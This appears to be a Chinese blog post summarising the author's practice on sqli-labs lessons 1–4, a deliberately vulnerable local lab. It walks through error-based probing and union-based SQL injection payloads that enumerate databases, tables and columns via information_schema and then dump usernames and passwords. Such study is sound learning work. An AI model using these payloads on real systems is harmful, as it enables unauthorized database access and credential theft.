<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>Sqlilabs Page1 less1-4学习总结 | Xiaoe&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="目录一、less1 - 4 的学习二、学习总结 一、less 1-4 的学习Less 1 简要的注入过程我们在 http:&#x2F;&#x2F;localhost&#x2F;sqli-labs-master&#x2F;Less-1&#x2F;?id&#x3D;1%27  后加入’我们会得到一个报错说明可能存在注入点，然后我们看到错误提示为’1’’ LIMIT 0,1，因为我们加了’，导致引号不能闭合。然后我们尝试用’or 1&#x3D;1–+ 其实可以直接用’–">
<meta property="og:type" content="article">
<meta property="og:title" content="Sqlilabs Page1 less1-4学习总结">
<meta property="og:url" content="http://example.com/2020/11/22/Sqlilabs-Page1-less1-4%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="Xiaoe&#39;s Blog">
<meta property="og:description" content="目录一、less1 - 4 的学习二、学习总结 一、less 1-4 的学习Less 1 简要的注入过程我们在 http:&#x2F;&#x2F;localhost&#x2F;sqli-labs-master&#x2F;Less-1&#x2F;?id&#x3D;1%27  后加入’我们会得到一个报错说明可能存在注入点，然后我们看到错误提示为’1’’ LIMIT 0,1，因为我们加了’，导致引号不能闭合。然后我们尝试用’or 1&#x3D;1–+ 其实可以直接用’–">
<meta property="og:locale">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D80Qjs.png">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D8BGMd.png">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D8sQiV.png">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D8yn6e.png">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D8y5A1.png">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D86C38.png">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D8coQO.png">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D821KS.png">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D8Wept.png">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D8fa8I.png">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D8hiid.png">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D84EtJ.png">
<meta property="og:image" content="https://s3.ax1x.com/2020/11/22/D84XDK.png">
<meta property="article:published_time" content="2020-11-22T07:02:00.000Z">
<meta property="article:modified_time" content="2020-11-22T11:25:21.873Z">
<meta property="article:author" content="Xiaoe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s3.ax1x.com/2020/11/22/D80Qjs.png">
  
    <link rel="alternate" href="/atom.xml" title="Xiaoe&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Xiaoe&#39;s Blog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-Sqlilabs-Page1-less1-4学习总结" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/11/22/Sqlilabs-Page1-less1-4%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/" class="article-date">
  <time datetime="2020-11-22T07:02:00.000Z" itemprop="datePublished">2020-11-22</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Sqlilabs Page1 less1-4学习总结
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <hr>
<h3 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h3><h3 id="一、less1-4-的学习"><a href="#一、less1-4-的学习" class="headerlink" title="一、less1 - 4 的学习"></a>一、less1 - 4 的学习</h3><h3 id="二、学习总结"><a href="#二、学习总结" class="headerlink" title="二、学习总结"></a>二、学习总结</h3><hr>
<p><br><br/><br><strong>一、less 1-4 的学习</strong><br>Less 1 简要的注入过程<br>我们在 <a target="_blank" rel="noopener" href="http://localhost/sqli-labs-master/Less-1/?id=1%27">http://localhost/sqli-labs-master/Less-1/?id=1%27</a>  后加入’我们会得到一个报错<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D80Qjs"><img src="https://s3.ax1x.com/2020/11/22/D80Qjs.png" alt="D80Qjs.png"></a><br>说明可能存在注入点，然后我们看到错误提示为’1’’ LIMIT 0,1，因为我们加了’，导致引号不能闭合。然后我们尝试用’or 1=1–+ 其实可以直接用’–+;<br>构造sql语句为Select <strong>**</strong> where id=’1’or 1=1–+’ LIMIT 0,1，得到如下图<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D8BGMd"><img src="https://s3.ax1x.com/2020/11/22/D8BGMd.png" alt="D8BGMd.png"></a><br>得到了正常的返回数据。<br>然后我们用order by 来确定判断数据表的列数。<br>再用union联合注入 输入<a target="_blank" rel="noopener" href="http://localhost/sqli-labs-master/Less-1/?id=-1&#39;">http://localhost/sqli-labs-master/Less-1/?id=-1&#39;</a> union select 1,2,3–+<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D8sQiV"><img src="https://s3.ax1x.com/2020/11/22/D8sQiV.png" alt="D8sQiV.png"></a><br>接下来爆数据库 输入<a target="_blank" rel="noopener" href="http://localhost/sqli-labs-master/Less-1/?id=-1&#39;">http://localhost/sqli-labs-master/Less-1/?id=-1&#39;</a> union select 1,group_concat(schema_name),3 from information_schema.schemata–+ 得到所有的输入库名<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D8yn6e"><img src="https://s3.ax1x.com/2020/11/22/D8yn6e.png" alt="D8yn6e.png"></a><br>爆 security 数据库的数据表 输入<a target="_blank" rel="noopener" href="http://localhost/sqli-labs-master/Less-1/?id=-1&#39;">http://localhost/sqli-labs-master/Less-1/?id=-1&#39;</a> union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=’security’–+ 得到数据库security的所有表<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D8y5A1"><img src="https://s3.ax1x.com/2020/11/22/D8y5A1.png" alt="D8y5A1.png"></a><br>接着我们爆users表的列 输入<a target="_blank" rel="noopener" href="http://localhost/sqli-labs-master/Less-1/?id=-1&#39;">http://localhost/sqli-labs-master/Less-1/?id=-1&#39;</a> union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’–+<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D86C38"><img src="https://s3.ax1x.com/2020/11/22/D86C38.png" alt="D86C38.png"></a><br>最后，可以爆数据了，输入<a target="_blank" rel="noopener" href="http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,username,password%20from%20users%20where%20id=2--+">http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,username,password%20from%20users%20where%20id=2--+</a><br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D8coQO"><img src="https://s3.ax1x.com/2020/11/22/D8coQO.png" alt="D8coQO.png"></a></p>
<hr>
<p><br></br><br>Less 2<br>仍然在id=1后面加个’，得到如下报错<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D821KS"><img src="https://s3.ax1x.com/2020/11/22/D821KS.png" alt="D821KS.png"></a><br>错误提示为’ LIMIT 0,1 ,我们只需注释掉剩余的查询，再id=1后面加–+，得到如下结果。<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D8Wept"><img src="https://s3.ax1x.com/2020/11/22/D8Wept.png" alt="D8Wept.png"></a><br>说明此处可以sql注入，剩下的注入和less 1 中的相同。</p>
<hr>
<p><br></br><br>Less 3<br>使用?id=’ 得到下图<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D8fa8I"><img src="https://s3.ax1x.com/2020/11/22/D8fa8I.png" alt="D8fa8I.png"></a><br>该报错为’’’)LIMIT 0,1’ 说明sql语句应该为Select login_name, select password from table where id= (‘our input here’)<br>我们只需用?id=1’)–+ 来注入。得到结果为<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D8hiid"><img src="https://s3.ax1x.com/2020/11/22/D8hiid.png" alt="D8hiid.png"></a><br>这样说明注入成功，接下来的操作与less 1 一样。</p>
<hr>
<p><br></br><br>Less 4<br>我们使用?id=1”，得到如下报错<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D84EtJ"><img src="https://s3.ax1x.com/2020/11/22/D84EtJ.png" alt="D84EtJ.png"></a><br>该报错为”1””)LIMIT 0,1 ,我们采用?id=1”)–+来注入，得到如下结果<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/D84XDK"><img src="https://s3.ax1x.com/2020/11/22/D84XDK.png" alt="D84XDK.png"></a><br>这样说明注入成功，接下来的操作与less 1 一样。</p>
<hr>
<p><br></br><br><strong>二、学习总结</strong></p>
<ul>
<li>什么是sql注入?<br>Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中，再在后台 Sql 服务器上解析执行进行的攻击。</li>
<li>less 1-4 都是用到了请求方式中的get请求方法。<br>get请求是从指定的资源请求数据，它的特点是参数直接从url中传递；还有一种请求方法为post，post是向指定的资源提交要被处理的数据，它的特点是常以提交表单形式传递参数。<br>参考博客：(<a target="_blank" rel="noopener" href="https://blog.csdn.net/helloc0de/article/details/76142478">https://blog.csdn.net/helloc0de/article/details/76142478</a>)</li>
<li>sql注入的参数类型<br>sql注入的参数类型分为字符型和数字型。less 1，less 3和less 4是字符型，less 2 是数字型</li>
<li>sql注入点怎么判断？<br>1、加入单引号’提交<br>2、数字型的判断：通常使用and 1=1 ;and 1=2<br>3、字符型的判断：通常使用’ and ‘1’=1；’ and  ‘1=2<br>4、搜索型的判断：简单的判断搜索型注入漏洞存在不存在的办法是先搜索’，如果出错，说明90%存在这个漏洞。然后搜<br>索%，如果正常返回，说明95%有洞了。<br>参考博客(<a target="_blank" rel="noopener" href="https://www.cnblogs.com/SCHAOGES/p/10889654.html">https://www.cnblogs.com/SCHAOGES/p/10889654.html</a>)</li>
<li>order by函数的原理<br>order by 后面跟哪个列名就是通过跟哪个列进行排序，如果后面跟的是数字，那么1就代表根据第一列排序，2代表第二列，3代表第三列，那么一直输入数字的大小就可以判断数据表有多少列了</li>
<li>union函数使用的注意点<br>在使用 union 查询的时候需要和主查询的列数相同</li>
<li>MYSQL数据库联合注入流程<br>1、判断是否存在注入点<br>2、判断查询列数，显示位置<br>3、获取数据库信息</li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2020/11/22/Sqlilabs-Page1-less1-4%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/" data-id="ckht1gr050000skugenqx6nib" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2020/11/07/markdown%E8%AF%AD%E6%B3%95/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">test</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/11/">November 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/11/22/Sqlilabs-Page1-less1-4%E5%AD%A6%E4%B9%A0%E6%80%BB%E7%BB%93/">Sqlilabs Page1 less1-4学习总结</a>
          </li>
        
          <li>
            <a href="/2020/11/07/markdown%E8%AF%AD%E6%B3%95/">test</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 Xiaoe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>